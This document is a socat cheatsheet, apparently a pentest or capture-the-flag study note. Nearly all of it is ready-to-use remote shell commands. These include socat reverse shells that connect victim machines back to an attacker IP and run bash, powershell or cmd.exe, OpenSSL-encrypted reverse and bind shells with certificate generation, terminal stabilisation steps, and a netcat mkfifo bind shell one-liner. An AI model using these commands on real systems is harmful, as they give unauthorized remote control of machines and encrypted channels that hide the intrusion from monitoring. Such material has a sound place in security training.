Socat Cheatsheet - Better netcat
Tool used to establish a more stabilize shell compare to netcat. Features:
- Used of the arrow key
- Allows for interactive commands such as sudo
- Use of CTRL + S, CTRL + C
Reverse Shell for Linux
Attacker:
socat TCP-L:<port> FILE:
tty,raw,echo=0
Victim:socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Additional step:
Open a new command prompt, and type stty-a, record the value of rows and columns
Next, in your reverse/bind shell, type:
stty rows <number>
note: The number represent the number you recorded.
and
stty cols <number>
Filling in the numbers you got from running the command in your own terminal.
This will change the registered width and height of the terminal, thus allowing programs such as text editors which rely on such information being accurate to correctly open.
Reverse Shell for Windows
Attacker:
socat tcp-l:<port> -
Victim: If you want spawn a powershell:- socat tcp:<attacker_ip>:<attacker_port> EXEC:powershell,pipes If you want spawn a command line:
- socat tcp:<attacker_ip>:<attacker_port> EXEC:cmd.exe,pipes
Then refer to the additional step.
Encrypted Shell
- Generate a Certificate:
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
- Merge key and cert together:
cat shell.key shell.crt > encrypt.pem
- Decide whether to use a reverse shell vs a blind shell.
Encrypted Reverse Shell for Linux
-
Set up a Listener on the Attacker
socat OPENSSL-LISTEN:<port>,cert=encrypt.pem,verify=0 FILE:
tty,raw,echo=0
-
Target machine connect back to the Attacker
socat OPENSSL:<attacker_ip>:<attacker_port>,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane
-
Refer to the additional step
Encrypted Reverse Shell for Windows
-
Set up a Listener on the Attacker Machine
socat OPENSSL-LISTEN:<port>,cert=encrypt.pem,verify=0 -
-
Target machine connect back to the Attacker
socat OPENSSL:<attacker_ip>:<attacker_port>,verify=0 -
-
Refer to the additional step
Encrypted Blind Shell for Linux
Note: Blind shell require you moving the .pem to the target
-
Set up a Listener on the Victim
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:/bin/bash
-
Attacker connect to the open port on the victim machine
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
-
Refer to the additional step
Encrypted Blind Shell for Windows
Note: Blind shell require you moving the .pem to the target
-
Set up a Listener on the Victim
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:powershell,pipes
If you want the command line:
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
-
Attacker connect to the open port on the victim machine
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -
-
Refer to the additional step
One tool I found helpful creating reverse-shell and blind shell: https://www.revshells.com/
However, I found the nc Blind to be wrong….
This is what it should be:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp [port] > /tmp/f